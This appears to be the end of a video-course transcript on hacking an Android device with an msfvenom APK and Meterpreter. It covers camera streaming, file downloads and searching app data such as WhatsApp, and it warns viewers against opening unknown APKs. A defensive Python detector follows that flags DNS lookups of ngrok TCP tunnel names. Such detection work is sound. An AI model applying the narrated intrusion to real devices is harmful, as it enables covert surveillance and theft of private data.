believe, yeah, it is kind of shady so you cannot see me clearly, but obviously we managed to hack in and obviously we managed to get the phone or tablet camera stream as well. So after you are done with it you can hit ctrl c to stop this from streaming, okay. So it will go back into your session and you can continue whatever you want to do with the Meterpreter session over here. And remember, it actually puts the files on your root, so you can reach those files that you have downloaded or that you have streamed from your root folder later on. So this is kind of cool, right: we managed to hack into the device, we managed to browse all the information, we managed to download whatever we want and we managed to actually open the camera of the phone as well. So you can try to go into the data of the related apps, like WhatsApp and other apps as well, try to find the logs and try to see if you have anything useful over there. And it's very easy to hack into the devices using msfvenom if you can come up with a good strategy, so beware of the hackers obviously. So if somebody sends you some apk don't open it if you don't know them; even if you know them, if you get suspicious don't open it, because it's very easy to get hacked as you can see. So it's not even easy to hack into the Windows machines because of the Defender and other antiviruses, but on Android in real life they won't even get detected, okay. So if you send them and if they click on it it will just pop open and you will get hacked. So just keep that in mind: if somebody sends you apks just don't open them. I suggest you stick to the Play Store. So of course somebody could have uploaded this to the Play Store as well, but it will be taken down eventually; they generally understand it in a couple of days, so you won't have that kind of risk over there, at least a very high risk. But if somebody sends you some apk through WhatsApp or some other platform just beware of it. So
that's it. We're going to stop here and we're going to start learning about Android development within the next section.
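
An added example, not part of the video or its course material: the apk described above connects back to an ngrok TCP endpoint (zero dot tcp dot ngrok dot io in the transcript), so a defender can flag devices on a network that look up such names. The DNS log format, the addresses and the function names are constructed assumptions; only the tcp.ngrok.io suffix comes from the transcript.

```python
from collections import defaultdict

# Assumption: the only suffix listed is the one heard in the transcript
# (0.tcp.ngrok.io); extend this tuple for other tunnel services you track.
TUNNEL_SUFFIXES = ("tcp.ngrok.io",)

# Constructed sample, assumed format: "<time> <client-ip> <qtype> <qname>".
SAMPLE_DNS_LOG = """\
2024-01-10T09:14:02Z 10.20.0.57 A 0.tcp.ngrok.io.
2024-01-10T09:14:03Z 10.20.0.57 A play.googleapis.com.
2024-01-10T09:15:40Z 10.20.0.12 A tcp.ngrok.io.example.org.
2024-01-10T09:16:11Z 10.20.0.12 A nottcp.ngrok.io.
2024-01-10T09:19:55Z 10.20.0.57 AAAA 0.TCP.NGROK.IO.
malformed line
2024-01-10T09:21:07Z 10.20.0.80 A 4.tcp.ngrok.io.
"""


def normalize(qname):
    """Lower-case a query name and drop the trailing root dot."""
    return qname.strip().rstrip(".").lower()


def is_tunnel_name(qname, suffixes=TUNNEL_SUFFIXES):
    """True when qname equals a tunnel suffix or is a subdomain of one.

    Matching on a label boundary avoids look-alikes such as
    nottcp.ngrok.io or tcp.ngrok.io.example.org.
    """
    name = normalize(qname)
    return any(name == s or name.endswith("." + s) for s in suffixes)


def find_tunnel_lookups(log_text):
    """Return ({client_ip: [(timestamp, name), ...]}, skipped_line_count)."""
    hits = defaultdict(list)
    skipped = 0
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            skipped += 1  # keep a count so parsing gaps are visible
            continue
        timestamp, client, _qtype, qname = fields
        if is_tunnel_name(qname):
            hits[client].append((timestamp, normalize(qname)))
    return dict(hits), skipped


if __name__ == "__main__":
    found, skipped = find_tunnel_lookups(SAMPLE_DNS_LOG)
    for client, lookups in sorted(found.items()):
        names = sorted({name for _, name in lookups})
        print(f"{client}: {len(lookups)} lookup(s), "
              f"{lookups[0][0]} to {lookups[-1][0]}, names={names}")
    print(f"skipped {skipped} unparseable line(s)")
```

A lookup of a tunnel name is a lead to investigate on the device, not proof of compromise, since developers also use these services legitimately.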